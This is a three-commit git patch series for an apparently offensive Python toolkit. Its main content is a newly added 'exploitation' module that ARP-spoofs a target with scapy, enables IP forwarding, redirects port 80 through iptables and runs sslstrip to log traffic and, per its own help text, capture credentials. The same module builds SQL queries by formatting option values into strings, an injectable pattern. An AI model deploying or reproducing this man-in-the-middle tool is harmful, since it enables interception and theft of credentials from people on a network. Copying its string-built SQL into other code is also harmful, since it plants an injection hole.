From 231c4114a6e3d9955932a45dc32d00d4736287f9 Mon Sep 17 00:00:00 2001 From: George Hughey Date: Sat, 3 Dec 2016 17:05:32 +0000 Subject: [PATCH 1/3] Added dependency --- pip_dependencies | 1 + 1 file changed, 1 insertion(+) diff --git a/pip_dependencies b/pip_dependencies index 2e5b8e6..9dbf50b 100644 --- a/pip_dependencies +++ b/pip_dependencies @@ -9,3 +9,4 @@ python-wifi psycopg2 pycrypto nose +flask_cors From 04ea04d701eee75c970becd025689876b0cf4f38 Mon Sep 17 00:00:00 2001 From: George Hughey Date: Sat, 3 Dec 2016 17:17:31 +0000 Subject: [PATCH 2/3] Changed tests --- tests.py | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/tests.py b/tests.py index 66b99cd..d715da7 100644 --- a/tests.py +++ b/tests.py @@ -6,7 +6,8 @@ prompt = Fore.BLUE + ">> " + Fore.RESET def base_test(): -<<<<<<< HEAD + cli = pexpect.spawn("sudo python cli.py") + cli.expect(re.escape(prompt)) pass def padding_tests(): @@ -18,9 +19,7 @@ def padding_tests(): print pad("123456789876") print pad("a") pass + + padding_tests() -======= - cli = pexpect.spawn("sudo python cli.py") - cli.expect(re.escape(prompt)) ->>>>>>> 9219848aa75d979a0ca9a6219a9a863455aa8158 From 63601968356e305ec98cb8787601feb6ccdd43ee Mon Sep 17 00:00:00 2001 From: George Hughey Date: Sat, 3 Dec 2016 19:36:52 +0000 Subject: [PATCH 3/3] Added sslstrip --- capabilities/exploitation/sslstrip.py | 47 +++++++++++++++++++++++++++ capabilities/exploitation/util_arp.py | 36 ++++++++++++++++++++ pip_dependencies | 1 + 3 files changed, 84 insertions(+) create mode 100644 capabilities/exploitation/sslstrip.py create mode 100644 capabilities/exploitation/util_arp.py diff --git a/capabilities/exploitation/sslstrip.py b/capabilities/exploitation/sslstrip.py new file mode 100644 index 0000000..f3c3614 --- /dev/null +++ b/capabilities/exploitation/sslstrip.py @@ -0,0 +1,47 @@ +from util_arp import * +import os +from capability import * + +class sslstrip(Capability): + + def __init__(self, core): + super(sslstrip, self).__init__(core) + self.name = "SSL Strip" + self.options = { + "masq" : Option("masq", "", "ID of the computer to masquerade as", True), + "source": Option("source", "", "ID of the source computer", True), + "dest": Option("dest", "", "ID of the target", True), + "name": Option("name", "ssl_log", "File to log output of sslstrip", True), + } + self.help_text = INFO + "ARP Spoof, then strip SSL traffic, allowing us to see credentials." + + def exec_command(self, comm): + self.core.cur.execute(comm) + return self.core.cur.fetchall()[0][0] + + def getVars(self): + self.masq_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq"))) + self.masq_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("masq"))) + self.source_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source"))) + self.source_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("source"))) + self.dest_ip = self.exec_command("SELECT IP FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest"))) + self.dest_mac = self.exec_command("SELECT MAC FROM COMPUTERS WHERE ID = '{0}'".format(self.get_value("dest"))) + + def arpGo(self): + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + return arpBegin(self.masq_ip, self.masq_mac, self.source_mac, self.dest_ip, self.dest_mac) + + def restore(self): + self.getVars() + self.proc.terminate() + arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac) + os.system("iptables -F") + os.system("killall sslstrip") + + + def launch(self): + self.getVars() + os.system("sslstrip -w " + str(self.get_value("name")) + " &") + self.proc = self.arpGo() + os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000") + return self.proc diff --git a/capabilities/exploitation/util_arp.py b/capabilities/exploitation/util_arp.py new file mode 100644 index 0000000..c5435a7 --- /dev/null +++ b/capabilities/exploitation/util_arp.py @@ -0,0 +1,36 @@ +from scapy.all import * +import subprocess +import os +import multiprocessing +#masq_ip: ip we masquerade as. +#masc_mac: Masqueraded mac address +#source_mac: Our mac address +#Dest IP: target ip +#Dest Mac: target mac address +#ex: arpDos("10.0.0.1", "00:0c:29:5f:e7:50", "b8:27:eb:c2:1c:52", "10.0.0.57", "00:0c:29:08:45:1a") + +def arpSend(masq_ip, masq_mac, source_mac, dest_ip, dest_mac): + packet = ARP() + packet.op = 2 + packet.psrc = masq_ip + packet.pdst = dest_ip + packet.hwdst = dest_mac + packet.hwsrc = source_mac + send(packet) + while True: + send(packet) + sniff(filter="arp and host " + masq_ip, count=1) + +def arpBegin(masq_ip, masq_mac, source_mac, dest_ip, dest_mac): + proc= multiprocessing.Process(target=arpSend, args=(masq_ip, masq_mac, source_mac, dest_ip, dest_mac)) + proc.start() + return proc + +def arpEnd(masq_ip, masq_mac, dest_ip, dest_mac): + packet = ARP() + packet.op = 2 + packet.psrc = masq_ip + packet.pdst = dest_ip + packet.hwdst = dest_mac + packet.hwsrc = masq_mac + send(packet) diff --git a/pip_dependencies b/pip_dependencies index 9dbf50b..2240022 100644 --- a/pip_dependencies +++ b/pip_dependencies @@ -10,3 +10,4 @@ psycopg2 pycrypto nose flask_cors +sslstrip